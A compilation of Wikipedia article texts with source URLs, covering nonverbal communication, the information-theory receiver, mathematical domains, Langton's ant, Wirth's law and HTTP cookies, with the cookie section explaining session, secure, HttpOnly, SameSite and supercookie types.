One aspect of nonverbal communication that aids in conveying these precise and symbolic meanings is "context-embeddedness." The idea that many children in Indigenous American Communities are closely involved in community endeavors, both spatially and relationally, which help to promote nonverbal communication, given that words are not always necessary. When children are closely related to the context of the endeavor as active participants, coordination is based on a shared reference, which helps to allow, maintain, and promote nonverbal communication.[85]The idea of "context-embeddedness" allows nonverbal communication to be a means of learning within Native AmericanAlaskan AthabaskansandCherokeecommunities. By observing various family and community social interactions, social engagement is dominated through nonverbal communication. For example, when children elicit thoughts or words verbally to their elders, they are expected to structure their speech carefully. This demonstrates cultural humility and respect as excessive acts of speech when conversational genre shifts reveal weakness and disrespect. This careful self-censorship exemplifies traditional social interaction of Athapaskin and Cherokee Native Americans who are mostly dependent on nonverbal communication.[86]
Nonverbal cues are used by most children in theWarm Springs Indian Reservationcommunity within the parameters of their academic learning environments. This includes referencingNative American religionthrough stylized hand gestures in colloquial communication, verbal and nonverbal emotional self-containment, and less movement of the lower face to structure attention on the eyes during face-to-face engagement. Therefore, children's approach to social situations within a reservation classroom, for example, may act as a barrier to a predominantly verbal learning environment. Most Warm Springs children benefit from a learning model that suits a nonverbal communicative structure of collaboration, traditional gesture,observational learningand shared references.[87]
It is important to note that while nonverbal communication is more prevalent in Indigenous American Communities, verbal communication is also used. Preferably, verbal communication does not substitute one's involvement in an activity, but instead acts as additional guidance or support towards the completion of an activity.[68]
As much of human communication is nonverbal, learning a language without learning its corresponding pragmatics can lead to miscommunication.[88]"This can lead to intercultural conflict (according to Marianna Pogosyan Ph.D.), misunderstandings and ambiguities in communication, despite language fluency."[88]Nonverbal communication makes the difference between bringing cultures together in understanding one another, appearing authentic. Or it can push people farther away due to misunderstandings in how different groups see certain nonverbal cues or gestures. From birth, children in various cultures are taught the gestures and cues their culture defines as universal which is not the case for others, but some movements are universal.[89]Evidence suggests that humans all smile when happy about something and frown when something is upsetting or bad.[89]
"In the study of nonverbal communications, the limbicbrainis where the action is...because it is the part of the brain that reacts to the world around us reflexively and instantaneously, in real time, and without thought."[47]There is evidence that the nonverbal cues made from person-to-person do not entirely have something to do withenvironment.[10]
Along with gestures, phenotypic traits can also convey certain messages in nonverbal communication, for instance, eye color, hair color and height. Research into height has generally found that taller people are perceived as being more impressive. Melamed and Bozionelos (1992) studied a sample of managers in the United Kingdom and found that height was a key factor in who was promoted. Height can have benefits and depressors too. "While tall people often command more respect than short people, height can also be detrimental to some aspects of one-to-one communication, for instance, where you need to 'talk on the same level' or have an 'eye-to-eye' discussion with another person and do not want to be perceived as too big for your boots."[10]
Chronemics is the way time is used. Our use of time can communicate and send messages, nonverbally. The way we use time and give or do not give our time to others can communicate different messages. Chronemics can send messages to others about what we value and also send messages about power. "When you go to see someone who is in a position of power over you, such as your supervisor, it is not uncommon to be kept waiting. However, you would probably consider it bad form to make a more powerful person wait for you. Indeed, the rule seems to be that the time of powerful people is more valuable than the time of less powerful people."[90]
Nonverbal communication plays a crucial role in effectively transmitting messages. Beginning from birth and persisting throughout one's life, it undergoes a developmental progression encompassing three phases, ranging from initial dyadic exchanges to the integration of both verbal and nonverbal cues. With diverse functions, nonverbal communication acts as a substitute for verbal interaction in situations where verbalization is unnecessary or impossible. It adds clarity to communication by unveiling emotional states and articulating specific feelings. This is achieved through various nonverbal elements such as emblems, illustrators, regulators, adaptors, and vocalics. This system is shaped by component including paralinguistics, kinesics, tactile communication, and proxemics, influencing social, academic, and professional contexts.[91]Despite frequently being overlooked, nonverbal cues possess the potential to convey up to 80% of a message, especially holding significance in interactions involving prelinguistic infants and individuals who have severe disabilities.[91]The cultural nuances of these cues underscore the necessity for interpretation, emphasizing the contextual, signaling, and interpretative dimensions.
Kinesicsis defined as movements, more specifically the study of our movements involving our hands, body, and face. The term was coined by Ray Birdwhistell, who considered the term body language inaccurate and instead opted to explain it as nonverbal behaviors stemming from body movement. Research around this behavior provides some examples, such as someone casually smiling and leaning forward, as well as maintaining eye contact to radiate a non-dominating and intimate demeanor. In contrast, someone leaning back, a stoic facial expression, and no to little eye contact could emit an unfriendly and dominating demeanor.[92]
Additional research expresses that eye contact is an important part of nonverbal communication involved in kinesics, as longer and appropriate levels of eye contact give an individual credibility. The opposite is said for those who do not maintain eye contact, as they are likely to be deemed distrustful. More eye contact was also found to be related to higher levels of likability and believability from those people interacted with. A real-life example of this is through service workers, in a study it was found that those workers who welcomed customers with smiles seemed like warmer individuals than those who did not smile. Customers reported that those without smiles and open body movements, such as waving or handshaking, were lacking warmth and deemed less friendly.[92]
Hapticsis the study of touching as nonverbal communication, and haptic communication refers to how people and other animals communicate via touching.
Touches among humans that can be defined as communication includehandshakes, holding hands, kissing (cheek, lips, hand), back slapping,high fives, a pat on the shoulder, and brushing an arm. Touching of oneself may include licking, picking, holding, and scratching.[33]: 9These behaviors are referred to as "adapters" or "tells" and may send messages that reveal the intentions or feelings of a communicator and a listener. The meaning conveyed from touch is highly dependent upon the culture, the context of the situation, the relationship between communicators, and the manner of touch.[33]: 10
Touch is an extremely important sense for humans; as well as providing information about surfaces and textures it is a component of nonverbal communication in interpersonal relationships, and vital in conveying physical intimacy. It can be both sexual (such as kissing) and platonic (such as hugging or tickling).
Touch is the earliest sense to develop in the fetus. Human babies have been observed to have enormous difficulty surviving if they do not possess a sense of touch, even if they retain sight and hearing.[93]Babies who can perceive through touch, even without sight and hearing, tend to fare much better.
In chimpanzees, the sense of touch is highly developed. As newborns, they see and hear poorly but cling strongly to their mothers. Harry Harlow conducted a controversial study involving rhesus monkeys and observed that monkeys reared with a "terry cloth mother," a wire feeding apparatus wrapped in soft terry cloth that provided a level of tactile stimulation and comfort, the monkey who had the real parent were considerably more emotionally stable as adults than those with a mere wire mother (Harlow, 1958).
Touching is treated differently from one country to another and socially acceptable levels of touching vary from one culture to another (Remland, 2009). In Thai culture, for example, touching someone's head may be thought rude. Remland and Jones (1995) studied groups of people communicating and found that touching was rare among the English (8%), the French (5%) and the Dutch (4%) compared to Italians (14%) and Greeks (12.5%).[94]Striking, pushing, pulling, pinching, kicking, strangling and hand-to-hand fighting are forms of touch in the context of physical abuse. In theJournal of Nonverbal Behavior,McDaniel et al. assessed touch as a form of communication among people from different nations under the lens of culture, relationships, and a number of body areas touched. Latin Americans are known to have a high degree of tactile activity in contrast to Asians who are considered a no-contact culture as they often steer away from public display of affection (PDA).
Proxemicsis defined as the use of space as a form of communication, and includes how far or near you position yourself from others; it can be influenced by culture, race/ethnicity, gender, and age. Edward T. Hall invented the term when he realized that culture influences how people use space in communication while working with diplomats, and published his findings on proxemics in 1959 asThe Silent Language.[49]Proxemics also play a big role in business as research shows that gender and invasion of customers' privacy without previous ties negatively affect the outcome of deals.[95]Besides, in high contact cultures, people are generally more comfortable in closer proximity, whereas individuals in low contact cultures feel more comfortable with a greater amount of personal space. Hall concluded that proxemics could cause misunderstandings between cultures as cultures use of proxemics varies and what is customary in one culture may range from being confusing to being offensive to members of a different culture.[96]
According toEdward T. Hall, the amount of space we maintain between ourselves and the persons we communicate with shows the importance of the science of proxemics. In this process, it is seen how we feel towards others at that particular time. This resonates with proxemics and viewing it through the cultural lens, people use their space differently because of the meaning behind it as in a spectrum of cultures, ideologies differ.[97]Within American culture, Hall defines four primary distance zones: (i) intimate (touching to eighteen inches) distance, (ii) personal (eighteen inches to four feet) distance, (iii) social (four to twelve feet) distance, and (iv) public (more than twelve feet) distance.
Intimate space is any distance less than 18 inches, and is most commonly used by individuals when they are engaging with someone with whom they feel very comfortable, such as a spouse, partner, friend, child, or parent. Personal space is a distance of 18 inches to 4 feet and is usually used when individuals are interacting with friends. Social distance is the most common type of proximity as it is used when communicating with colleagues, classmates, acquaintances, or strangers. Public distance creates the greatest gap between the individual and the audience and is categorized as distances greater than 12 feet in distance and is often used for speeches, lectures, or formal occasions.[98]
When communicating face-to-face with someone, it is sometimes hard to differentiate which parts of conversing are communicated via verbally or non-verbally.[99]Other studies done on the same subject have concluded that in more relaxed and natural settings of communication, verbal and non-verbal signals and cues can contribute in surprisingly similar ways.[100]Argyle,[28]using video tapes shown to the subjects, analysed the communication of submissive/dominant attitude, (high and low context, high context resorting to more strict social classes and take a more short and quick response route to portray dominance, low context being the opposite by taking time to explain everything and putting a lot of importance on communication and building trust and respect with others in a submissive and relaxed manner),[101]and found that non-verbal cues had 4.3 times the effect of verbal cues. The most important effect was that body posture communicated superior status (specific to culture and context said person grew up in) in a very efficient way. On the other hand, a study by Hsee et al.[102]had subjects judge a person on the dimension happy/sad and found that words spoken with minimal variation in intonation had an impact about 4 times larger than face expressions seen in a film without sound. Therefore, when considering certain non-verbal mannerisms such as facial expressions and physical cues, they can conflict in meaning when compared to spoken language and emotions. Different set ups and scenarios would yield different responses and meanings when using both types of communication. In other ways they can complement each other, provided they are used together wisely during a conversation.[28]
When seeking to communicate effectively, it is important that the nonverbal conversation supports the verbal conversation, and vice versa. If the nonverbal cues converge with what we are saying verbally, then our message is further reinforced.[103]Mindfulnessis one technique that can help improve our awareness of NVC. If we become more mindful and present to how our body is moving, then we can better control our external nonverbal communication, which results in more effective communication.[104]
During communication, nonverbal messages can interact with verbal messages in six ways: repeating, conflicting, complementing, substituting, regulating and accenting/moderating.
Conflicting verbal and nonverbal messages within the same interaction can sometimes send opposing or conflicting messages. A person verbally expressing a statement of truth while simultaneously fidgeting or avoiding eye contact may convey a mixed message to the receiver in the interaction. Conflicting messages may occur for a variety of reasons often stemming from feelings of uncertainty, ambivalence, or frustration. When mixed messages occur, nonverbal communication becomes the primary tool people use to attain additional information to clarify the situation; great attention is placed on bodily movements and positioning when people perceive mixed messages during interactions. Definitions of nonverbal communication creates a limited picture in our minds but there are ways to create a clearer one. There are different dimensions of verbal and nonverbal communication that have been discovered. They are (1) structure versus non-structure, (2) linguistic versus non-linguistic, (3) continuous versus discontinuous, (4) learned versus innate, and (5) left versus right hemispheric processing.[105]: 7
Accurate interpretation of messages is made easier when nonverbal and verbal communication complement each other. Nonverbal cues can be used to elaborate on verbal messages to reinforce the information sent when trying to achieve communicative goals; messages have been shown to be remembered better when nonverbal signals affirm the verbal exchange.[33]: 14
Nonverbal behavior is sometimes used as the sole channel for communication of a message. People learn to identify facial expressions, body movements, and body positioning as corresponding with specific feelings and intentions. Nonverbal signals can be used withoutverbal communicationto convey messages; when nonverbal behavior does not effectively communicate a message, verbal methods are used to enhance understanding.[33]: 16
Verbal communication is a highly structured form of communication with set rules of grammar. The rules of verbal communication help to understand and make sense of what other people are saying. For example, foreigners learning a new language can have a hard time making themselves understood. On the other hand, nonverbal communication has no formal structure when it comes to communicating. Nonverbal communication occurs without even thinking about it. The same behavior can mean different things, such as crying of sadness or of joy. Therefore, these cues need to be interpreted carefully to get their correct meaning.[105]: 7–8
There are only a few assigned symbols in the system of nonverbal communication. Nodding the head is one symbol that indicates agreement in some cultures, but in others, it means disagreement. On the other hand, verbal communication has a system of symbols that have specific meanings to them.[105]: 8
Verbal communication is based on discontinuous units whereas nonverbal communication is continuous. Communicating nonverbally cannot be stopped unless one would leave the room, but even then, the intrapersonal processes still take place (individuals communicating with themselves). Without the presence of someone else, the body still manages to undergo nonverbal communication. For example, there are no other words being spoken after a heated debate, but there are still angry faces and cold stares being distributed. This is an example of how nonverbal communication is continuous.[105]: 8
Learned non-verbal cues require a community or culture for their reinforcement. For example, table manners are not innate capabilities upon birth. Dress code is a non-verbal cue that must be established by society. Hand symbols, whose interpretation can vary from culture to culture, are not innate nonverbal cues. Learned cues must be gradually reinforced by admonition or positive feedback.
Innate non-verbal cues are "built-in" features of human behavior. Generally, these innate cues are universally prevalent and regardless of culture. For example, smiling, crying, and laughing do not require teaching. Similarly, some body positions, such as the fetal position, are universally associated with weakness. Due to their universality, the ability to comprehend these cues is not limited to individual cultures.[105]: 9
This type of processing involves the neurophysiological approach to nonverbal communication. It explains that the right hemisphere processes nonverbal stimuli such as those involving spatial, pictorial, and gestalt tasks while the left hemisphere involves the verbal stimuli involving analytical and reasoning tasks. It is important to know the implications in processing the differences between verbal and nonverbal communication messages. It is possible that individuals may not use the correct hemisphere at appropriate times when it comes to interpreting a message or meaning.[105]: 9
From 1977 to 2004, the influence of disease and drugs on receptivity of nonverbal communication was studied by teams at three separate medical schools using a similar paradigm.[106]Researchers at the University of Pittsburgh, Yale University and Ohio State University had subjects observe gamblers at a slot machine awaiting payoffs. The amount of this payoff was read by nonverbal transmission prior to reinforcement. This technique was developed by and the studies directed by psychologist Robert E. Miller and psychiatrist A. James Giannini. These groups reported diminished receptive ability in heroin addicts[107]and phencyclidine abusers,[108]contrasted with increased receptivity in cocaine addicts. Men with major depression[109]manifested significantly decreased ability to read nonverbal cues when compared with euthymic men.
In some subjects tested for ability to read nonverbal cues, intuitive paradigms were apparently employed while in others a cause and effect approach was used.[110]Subjects in the former group answered quickly and before reinforcement occurred. They could not give a rationale for their particular responses. Subjects in the latter category delayed their response and could offer reasons for their choice. The level of accuracy between the two groups did not vary nor did handedness.[111]
Obese women[112]and women with premenstrual syndrome[113]were found to also possess diminished abilities to read these cues. In contradistinction, men with bipolar disorder possessed increased abilities.[114]A woman with total paralysis of the nerves of facial expression was found unable to transmit or receive any nonverbal facial cues whatsoever.[115]Because of the changes in levels of accuracy on the levels of nonverbal receptivity, the members of the research team hypothesized a biochemical site in the brain which was operative for reception of nonverbal cues. Because certain drugs enhanced ability while others diminished it, the neurotransmitters dopamine and endorphin were considered to be likely etiological candidate. Based on the available data, however, the primary cause and primary effect could not be sorted out on the basis of the paradigm employed.[116]
An increased emphasis on gestures exists when intonations or facial expression are used. "Speakers often anticipate how recipients will interpret their utterances. If they wish some other, less obvious interpretation, they may "mark" their utterance (e.g. with special intonations or facial expressions)."[117]This specific emphasis known as 'marking' can be spotted as a learned form of non-verbal communication in toddlers. A groundbreaking study fromCarpenteret al. in theJournal of Child Languagehas concluded that the act of marking a gesture is recognized by three-year-olds but not by two-year-olds.
In the study, two and three-year-old toddlers were tested on their recognition of markedness within gestures. The experiment was conducted in a room with an examiner and the test subjects, which for the first study were three-year-olds. The examiner sat across from each child individually, and allowed them to play with various objects including a purse with a sponge in it and a box with a sponge in it. After allowing the child to play with the objects for three minutes, the examiner told the child it was time to clean up and motioned by pointing to the objects. They measured the responses of the children by first pointing and not marking the gesture, to see the child's reaction to the request and if they reached for the objects to clean them up. After observing the child's response, the examiner then asked and pointed again, marking the gesture with facial expression, as to lead the child to believe the objects were supposed to be cleaned up. The results showed that three-year-old children were able to recognize the markedness, by responding to the gesture and cleaning the objects up as opposed to when the gesture was presented without being marked.
In the second study in which the same experiment was performed on two-year-olds, the results were different. For the most part, the children did not recognize the difference between the marked and unmarked gesture by not responding more prevalently to the marked gesture, unlike the results of the three-year-olds. This shows that this sort of nonverbal communication is learned at a young age, and is better recognized in three-year-old children than two-year-old children, making it easier for us to interpret that the ability to recognize markedness is learned in the early stages of development, somewhere between three and four years of age.
Boone and Cunningham conducted a study[118]to determine at which age children begin to recognize emotional meaning (happiness, sadness, anger and fear) in expressive body movements. The study included 29 adults and 79 children divided into age groups of four-, five- and eight-year-olds. The children were shown two clips simultaneously and were asked to point to the one that was expressing the target emotion. The results of the study revealed that of the four emotions being tested the 4-year-olds were only able to correctly identify sadness at a rate that was better than chance. The 5-year-olds performed better and were able to identify happiness, sadness and fear at better than chance levels. The 8-year-olds and adults could correctly identify all four emotions and there was very little difference between the scores of the two groups. Between the ages of 4 and 8, nonverbal communication and decoding skills improve dramatically.
A byproduct of the work of the Pittsburgh/Yale/Ohio State team was an investigation of the role of nonverbal facial cues in heterosexual nondate rape. Males who were serial rapists of adult women were studied for nonverbal receptive abilities. Their scores were the highest of any subgroup.[119]Rape victims were next tested. It was reported that women who had been raped on at least two occasions by different perpetrators had a highly significant impairment in their abilities to read these cues in either male or female senders.[120]These results were troubling, indicating a predator-prey model. The authors did note that whatever the nature of these preliminary findings the responsibility of the rapist was in no manner or level diminished.
The final target of study for this group was the medical students they taught. Medical students at Ohio State University, Ohio University and Northeast Ohio Medical College were invited to serve as subjects. Students indicating a preference for the specialties of family practice, psychiatry, pediatrics and obstetrics-gynecology achieved significantly higher levels of accuracy than those students who planned to train as surgeons, radiologists, or pathologists. Internal medicine and plastic surgery candidates scored at levels near the mean.[121]
|
https://en.wikipedia.org/wiki/Nonverbal_communication
|
Thereceiverininformation theoryis the receiving end of acommunication channel. It receivesdecodedmessages/informationfrom the sender, who firstencodedthem.[1]Sometimes the receiver is modeled so as to include the decoder. Real-world receivers likeradio receiversortelephonescan not be expected to receive as much information as predicted by thenoisy channel coding theorem.
|
https://en.wikipedia.org/wiki/Receiver_(Information_Theory)
|
Inmathematical analysis, adomainorregionis anon-empty,connected, andopen setin atopological space. In particular, it is any non-empty connected opensubsetof thereal coordinate spaceRnor thecomplex coordinate spaceCn. A connected open subset ofcoordinate spaceis frequently used for thedomain of a function.[1]
The basic idea of a connected subset of a space dates from the 19th century, but precise definitions vary slightly from generation to generation, author to author, and edition to edition, as concepts developed and terms were translated between German, French, and English works. In English, some authors use the termdomain,[2]some use the termregion,[3]some use both terms interchangeably,[4]and some define the two terms slightly differently;[5]some avoid ambiguity by sticking with a phrase such asnon-empty connected open subset.[6]
One common convention is to define adomainas a connected open set but aregionas theunionof a domain with none, some, or all of itslimit points.[7]Aclosed regionorclosed domainis the union of a domain and all of its limit points.
Various degrees of smoothness of theboundaryof the domain are required for various properties of functions defined on the domain to hold, such as integral theorems (Green's theorem,Stokes theorem), properties ofSobolev spaces, and to definemeasureson the boundary and spaces oftraces(generalized functions defined on the boundary). Commonly considered types of domains are domains withcontinuousboundary,Lipschitz boundary,C1boundary, and so forth.
Abounded domainis a domain that isbounded, i.e., contained in some ball.Bounded regionis defined similarly. Anexterior domainorexternal domainis a domain whosecomplementis bounded; sometimes smoothness conditions are imposed on its boundary.
Incomplex analysis, acomplex domain(or simplydomain) is any connected open subset of thecomplex planeC. For example, the entire complex plane is a domain, as is the openunit disk, the openupper half-plane, and so forth. Often, a complex domain serves as thedomain of definitionfor aholomorphic function. In the study ofseveral complex variables, the definition of a domain is extended to include any connected open subset ofCn.
InEuclidean spaces,one-,two-, andthree-dimensionalregions arecurves,surfaces, andsolids, whose extent are called, respectively,length,area, andvolume.
Definition. An open set is connected if it cannot be expressed as the sum of two open sets. An open connected set is called a domain.
German:Eine offene Punktmenge heißt zusammenhängend, wenn man sie nicht als Summe von zwei offenen Punktmengen darstellen kann. Eine offene zusammenhängende Punktmenge heißt ein Gebiet.
According toHans Hahn,[8]the concept of a domain as an open connected set was introduced byConstantin Carathéodoryin his famous book (Carathéodory 1918).
In this definition, Carathéodory considers obviouslynon-emptydisjointsets.
Hahn also remarks that the word "Gebiet" ("Domain") was occasionally previously used as asynonymofopen set.[9]The rough concept is older. In the 19th and early 20th century, the termsdomainandregionwere often used informally (sometimes interchangeably) without explicit definition.[10]
However, the term "domain" was occasionally used to identify closely related but slightly different concepts. For example, in his influentialmonographsonelliptic partial differential equations,Carlo Mirandauses the term "region" to identify an open connected set,[11][12]and reserves the term "domain" to identify an internally connected,[13]perfect set, each point of which is an accumulation point of interior points,[11]following his former masterMauro Picone:[14]according to this convention, if a setAis a region then itsclosureAis a domain.[11]
|
https://en.wikipedia.org/wiki/Closed_region
|
Langton's antis a two-dimensionalTuring machinewith a very simple set of rules but complexemergentbehavior. It was invented byChris Langtonin 1986 and runs on asquare latticeof black and white cells.[1]The idea has been generalized in several different ways, such asturmiteswhich add more colors and more states.
Squares on a plane are colored variously either black or white. We arbitrarily identify one square as the "ant". The ant can travel in any of the four cardinal directions at each step it takes. The "ant" moves according to the rules below:
Langton's ant can also be described as acellular automaton, where the grid is colored black or white and the "ant" square has one of eight different colors assigned to encode the combination of black/white state and the current direction of motion of the ant.[2]
These simple rules lead to complex behavior. Three distinct modes of behavior are apparent,[3]when starting on a completely white grid.
Allfiniteinitial configurations tested eventually converge to the same repetitive pattern, suggesting that the "highway" is anattractorof Langton's ant, but no one has been able to prove that this is true for all such initial configurations. It is only known that the ant's trajectory is always unbounded regardless of the initial configuration[4]– this result was incorrectly attributed and is known as theCohen-Kong theorem.[5]
In 2000, Gajardo et al. showed a construction that calculates anyboolean circuitusing the trajectory of a single instance of Langton's ant.[2]
Greg TurkandJim Proppconsidered a simple extension to Langton's ant where instead of just two colors, more colors are used.[6]The colors are modified in a cyclic fashion. A simple naming scheme is used: for each of the successive colors, a letter "L" or "R" is used to indicate whether a left or right turn should be taken. Langton's ant has the name "RL" in this naming scheme.
Some of these extended Langton's ants produce patterns that becomesymmetricover and over again. One of the simplest examples is the ant "RLLR". One sufficient condition for this to happen is that the ant's name, seen as a cyclic list, consists of consecutive pairs of identical letters "LL" or "RR". The proof involvesTruchet tiles.
The hexagonal grid permits up to six different rotations, which are notated here as N (no change), R1(60° clockwise), R2(120° clockwise), U (180°), L2(120° counter-clockwise), L1(60° counter-clockwise).
A further extension of Langton's ants is to consider multiple states of the Turing machine – as if the ant itself has a color that can change. These ants are calledturmites, a contraction of "Turing machinetermites". Common behaviours include the production of highways, chaotic growth and spiral growth.[7]
Multiple Langton's ants can co-exist on the 2D plane, and their interactions give rise to complex, higher-order automata that collectively build a wide variety of organized structures.
There are different ways of modelling their interaction and the results of the simulation may strongly depend on the choices made.[8]
Multiple turmites can co-exist on the 2D plane as long as there is a rule that defines what happens when they meet.Ed Pegg, Jr.considered ants that can turn for examplebothleft and right, splitting in two and annihilating each other when they meet.[9]
|
https://en.wikipedia.org/wiki/Langton%27s_ant
|
Wirth's lawis anadageoncomputer performancewhich states thatsoftwareis getting slower more rapidly thanhardwareis becoming faster.
The adage is named afterNiklaus Wirth, a computer scientist who discussed it in his 1995 article "A Plea for Lean Software".[1][2]
Wirth attributed the saying toMartin Reiser, who in the preface to his book on theOberon Systemwrote: "The hope is that the progress in hardware will cure all software ills. However, a critical observer may observe that software manages to outgrow hardware in size and sluggishness."[3]Other observers had noted this for some time before; indeed, the trend was becoming obvious as early as 1987.[4]
He states two contributing factors to the acceptance of ever-growing software as: "rapidly growing hardware performance" and "customers' ignorance of features that are essential versus nice-to-have".[1]Enhanced user convenience and functionality supposedly justify the increased size of software, but Wirth argues that people are increasingly misinterpreting complexity as sophistication, that "these details are cute but not essential, and they have a hidden cost".[1]As a result, he calls for the creation of "leaner" software and pioneered the development ofOberon, a software system developed between 1986 and 1989 based on nothing but hardware. Its primary goal was to show that software can be developed with a fraction of the memory capacity and processor power usually required, without sacrificing flexibility, functionality, or user convenience.[1]
The law was restated in 2009 and attributed toGoogleco-founderLarry Page. It has been referred to asPage's law.[5]The first use of that name is attributed to fellow Google co-founderSergey Brinat the 2009Google I/OConference.[6]
Other common forms use the names of the leadinghardwareand software companies of the 1990s,IntelandMicrosoft, or their CEOs,Andy GroveandBill Gates, for example "What Intel giveth, Microsoft taketh away"[7]andAndy and Bill's law: "What Andy giveth, Bill taketh away".[8]
Gates's law("The speed of software halves every 18 months"[9]) is an anonymously coined variant on Wirth's law, its name referencing Bill Gates,[9]co-founder of Microsoft. It is an observation that the speed of commercial software generally slows by 50% every 18 months, thereby negating all the benefits ofMoore's law. This could occur for a variety of reasons:feature creep,code cruft, developer laziness, lack of funding, forced updates, forced porting (to a newerOSor to support a new technology) or a management turnover whose design philosophy does not coincide with the previous manager.[10]
May's law, named afterDavid May, is a variant stating: "Software efficiency halves every 18 months, compensating Moore's law".[11]
|
https://en.wikipedia.org/wiki/Wirth%27s_law
|
HTTP cookie(also calledweb cookie,Internet cookie,browser cookie, or simplycookie) is a small block ofdatacreated by aweb serverwhile auserisbrowsingawebsiteand placed on the user's computer or other device by the user'sweb browser. Cookies are placed on the device used to access a website, and more than one cookie may be placed on a user's device during a session.
Cookies serve useful and sometimes essential functions on theweb. They enable web servers to storestatefulinformation (such as items added in the shopping cart in anonline store) on the user's device or to track the user's browsing activity (including clicking particular buttons,logging in, or recording whichpages were visited in the past).[1]They can also be used to save information that the user previously entered intoform fields, such as names, addresses,passwords, andpayment card numbersfor subsequent use.
Authentication cookiesare commonly used by web servers toauthenticatethat a user is logged in, and with whichaccountthey are logged in. Without the cookie, users would need to authenticate themselves by logging in on each page containing sensitive information that they wish to access. The security of an authentication cookie generally depends on the security of the issuing website and the user's web browser, and on whether the cookie data isencrypted.Security vulnerabilitiesmay allow a cookie's data to be read by anattacker, used to gain access touser data, or used to gain access (with the user's credentials) to the website to which the cookie belongs (seecross-site scriptingandcross-site request forgeryfor examples).[2]
Tracking cookies, and especiallythird-party tracking cookies, are commonly used as ways to compile long-term records of individuals'browsing histories— a potentialprivacy concernthat prompted European[3]and U.S. lawmakers to take action in 2011.[4][5]European law requires that all websites targetingEuropean Unionmember states gain "informed consent" from users before storing non-essential cookies on their device.
The termcookiewas coined by web-browser programmerLou Montulli. It was derived from the termmagic cookie, which is a packet of data a program receives and sends back unchanged, used byUnixprogrammers.[6][7]
Magic cookies were already used in computing when computer programmerLou Montullihad the idea of using them in web communications in June 1994.[8]At the time, he was an employee ofNetscape Communications, which was developing ane-commerceapplication forMCI.Vint CerfandJohn Klensinrepresented MCI in technical discussions with Netscape Communications. MCI did not want its servers to have to retain partial transaction states, which led them to ask Netscape to find a way to store that state in each user's computer instead. Cookies provided a solution to the problem of reliably implementing avirtual shopping cart.[9][10]
Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta ofMosaic Netscape, released on October 13, 1994,[11][12]supported cookies.[10]The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, which was granted in 1998.[13]Support for cookies was integrated withInternet Explorerin version 2, released in October 1995.[14]
The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of their presence.[15]The public learned about cookies after theFinancial Timespublished an article about them on February 12, 1996.[16]In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S.Federal Trade Commissionhearings in 1996 and 1997.[2]
The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talkmailing list. A special working group within theInternet Engineering Task Force(IETF) was formed. Two alternative proposals for introducing state in HTTP transactions had been proposed byBrian Behlendorfand David Kristol respectively. But the group, headed by Kristol himself and Lou Montulli, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specifies that third-party cookies were either not allowed at all, or at least not enabled by default.[17]At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.
RFC 2965 added aSet-Cookie2header field, which informally came to be called "RFC 2965-style cookies" as opposed to the originalSet-Cookieheader field which was called "Netscape-style cookies".[18][19]Set-Cookie2was seldom used, however, and wasdeprecatedin RFC 6265 in April 2011 which was written as a definitive specification for cookies as used in the real world.[20]No modern browser recognizes theSet-Cookie2header field.[21]
Asession cookie(also known as anin-memory cookie,transient cookieornon-persistent cookie) exists only in temporary memory while the user navigates a website.[22]Session cookies expire or are deleted when the user closes the web browser.[23]Session cookies are identified by the browser by the absence of an expiration date assigned to them.
Apersistent cookieexpires at a specific date or after a specific length of time. For the persistent cookie's lifespan set by its creator, its information will be transmitted to the server every time the user visits the website that it belongs to, or every time the user views a resource belonging to that website from another website (such as an advertisement).
For this reason, persistent cookies are sometimes referred to astracking cookies[24][25]because they can be used by advertisers to record information about a user's web browsing habits over an extended period of time. Persistent cookies are also used for reasons such as keeping users logged into their accounts on websites, to avoid re-entering login credentials at every visit.(See§ Uses, below.)
Asecure cookiecan only be transmitted over an encrypted connection (i.e.HTTPS). They cannot be transmitted over unencrypted connections (i.e.HTTP). This makes the cookie less likely to be exposed to cookie theft viaeavesdropping. A cookie is made secure by adding theSecureflag to the cookie.
Anhttp-only cookiecannot be accessed by client-side APIs, such asJavaScript. This restriction eliminates the threat of cookie theft viacross-site scripting(XSS).[26]However, the cookie remains vulnerable tocross-site tracing(XST) andcross-site request forgery(CSRF) attacks. A cookie is given this characteristic by adding theHttpOnlyflag to the cookie.
In 2016Google Chromeversion 51 introduced[27]a new kind of cookie with attributeSameSitewith possible values ofStrict,LaxorNone.[28]With attributeSameSite=Strict, the browsers would only send cookies to a target domain that is the same as the origin domain. This would effectively mitigatecross-site request forgery(CSRF) attacks. WithSameSite=Lax, browsers would send cookies with requests to a target domain even it is different from the origin domain, but only forsaferequests such as GET (POST is unsafe) and not third-party cookies (inside iframe). AttributeSameSite=Nonewould allow third-party (cross-site) cookies, however, most browsers requiresecure attributeon SameSite=None cookies.[29]
The Same-site cookie is incorporated into a new RFC draft for "Cookies: HTTP State Management Mechanism"[30]to update RFC 6265 (if approved).
Chrome, Firefox, and Edge started to support Same-site cookies.[31]The key of rollout is the treatment of existing cookies without the SameSite attribute defined, Chrome has been treating those existing cookies as if SameSite=None, this would let all website/applications run as before. Google intended to change that default toSameSite=Laxin Chrome 80 planned to be released in February 2020,[32]but due to potential for breakage of those applications/websites that rely on third-party/cross-site cookies andCOVID-19circumstances, Google postponed this change to Chrome 84.[33][34]
Asupercookieis a cookie with an origin of atop-level domain(such as.com) or a public suffix (such as.co.uk). Ordinary cookies, by contrast, have an origin of a specific domain name, such asexample.com.
Supercookies can be a potential security concern and are therefore often blocked by web browsers. If unblocked by the browser, an attacker in control of a malicious website could set a supercookie and potentially disrupt or impersonate legitimate user requests to another website that shares the same top-level domain or public suffix as the malicious website. For example, a supercookie with an origin of.comcould maliciously affect a request made toexample.com, even if the cookie did not originate fromexample.com. This can be used to fake logins or change user information.
